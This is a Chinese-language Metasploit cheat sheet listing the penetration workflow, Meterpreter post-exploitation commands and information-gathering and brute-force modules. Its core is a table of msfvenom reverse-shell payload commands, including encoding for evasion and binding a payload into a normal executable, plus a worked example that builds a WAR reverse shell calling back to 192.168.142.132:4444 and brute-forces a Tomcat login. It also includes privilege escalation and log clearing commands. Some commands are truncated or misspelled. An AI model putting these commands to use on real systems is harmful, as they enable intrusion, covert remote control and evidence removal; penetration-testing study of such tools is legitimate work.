Meatasploit 基础操作
MSF 渗透流程(自上而下)
| 序号 | 命令 | 说明 |
|---|---|---|
| search 模块 | 根据收集的信息搜索 | |
| info 模块名 | 查看模块信息 | |
| use 模块名 | 选择模块 | |
| show payloads | 查看可以使用的攻击载荷 | |
| set payload | 设置攻击载荷 | |
| show targets | 查看攻击目标信息 | |
| show options/advance | 查看基本参数和高级参数 | |
| set name | 设置参数值 | |
| exploit/run | 执行攻击 | |
| session -l | 列出会话 | |
| session -i Id | 切换到指定会话 |
MSF 基本命令
| 命令 | 说明 |
|---|---|
| msfconsole | 启动终端 |
| banner | 展示 banner |
| help /? | 查看帮助, help + 命令 |
| search | 搜索漏洞和利用数据库 |
| info | 查看模块的信息 |
| use | 使用模块 |
| show options | 查看所使用模块需要配置的参数 |
| set | 设置参数值 |
| run/exploit | 执行模块 |
| back | 退回到主界面 |
| quit/exit | 退出 msf |
核心模块说明
| 模块名 | 作用 |
|---|---|
| Exploits | 利用模块 |
| Payloads | 攻击载荷模块 |
| Auxiliary | 辅助模块 |
| Post | 后渗透模块 |
| Encoders | 编码模块 |
| Evasion | 免杀模块 (没什么暖用) |
| Nops | 空模块 |
Meterpreter 中常用命令(这时你已经连上了 靶机)
| 命令 | 说明 |
|---|---|
| sysinfo | 查看目标机系统信息 |
| getuid | 查看用户 |
| pwd/getIwd | 查看当前目录 |
| cd/Icd | 切换目录 |
| background | 把当前会话放到后台 |
| sessions -i id | 切换到指定会话 |
| sessions -k id | 杀死指定会话 |
| shell | 进入目标主机 shell |
| upload file | 向目标主机上传文件 |
| download file | 从目标主机下载文件 |
| search | 在目标主机上搜索文件 search -f test |
| execute | 在目标主机执行程序 execute -H -i -f cmd.exe |
| getsystem | 提权 |
| clearev | 清楚痕迹 |
MSF 信息收集常用模块
| 作用 | 命令 |
|---|---|
| 主机发现 | use auxiliary/scanner/discovery/arp_sweep |
| 端口扫描 | use auxiliary/scanner/portscan/tcp |
| 目录扫描 | use auxiliary/scanner/http/dir_scanner |
| SSH爆破 | use auxiliary/scanner/ssh/ssh_login |
| mysql 服务发现 | use auxiliary/scanner/mysql/mysql_version |
| smb 服务发现 | use auxiliary/scancer/smb/smb_version |
| telnet 服务发现 | use auxiliary/scanner/telnet/telnet_version |
| rdp 服务发现 | use auxiliary/scanner/rdp/rdp_scanner |
反弹 shell 相关
常用的反弹 shell
| 相关程序利用 | 命令 |
|---|---|
| 普通生成 | msfvenom -p windows/meterpreter/reverse_tcp -f exe -o C:\back.exe |
| 编码处理型 | msfvenom -p windows/meterpreter/reverse_tcp -i3 -e x86/shikata_ga_nai -f exe -o C:\back.exe |
| 捆绑 | msfvenom -p windows/meterpreter/reverse tcp -platform windows -a x86 -x C:\nomal.exe -k -f exe -o C:\shell.exe |
| Windows | msfvenom -platform windows -a x86 -p windows/x64/meterpreter/reverse_tcp -f exe -o C:\back.exe |
| Linux | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= |
| MAC | msfvenom -p osx/x86/shell_reverse_tcp LHOST= |
| PHP | msfvenom -p php/meterpreter_reverse_tcp LHOST= |
| Asp | msfvenom -p windows/meterpreter/reverse_tcp LHOST= |
| Aspx | msfvenom -p windows/meterpreter/reverse_tcp LHOST= |
| JSP | msfvenom -p java/jsp_shell reverse_tcp LHOST= |
| War | msfvenom -p java/jsp_shell reverse_tcp LHOST= |
| Bash | msfvenom -p cmd/unix/reverse_bash LHOST= |
| Perl | msfvenom -p cmd/unix/reverse_perl LHOST= |
| Python | msfvenom -p python/meterpreter/reverser_tcp LHOST= |
反弹 shell 的利用案例
metasploit 外 使用 msfvenom 命令生成 反弹 shell 文件
1 | msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.142.132 lport=4444 -f war -o kali.war |
metasploit 中利用
1 | use exploit/multi/handler |
metasploit 脚本使用案例
tomcat 密码爆破
1 | use auxiliary/scanner/http/tomcat_mgr_login |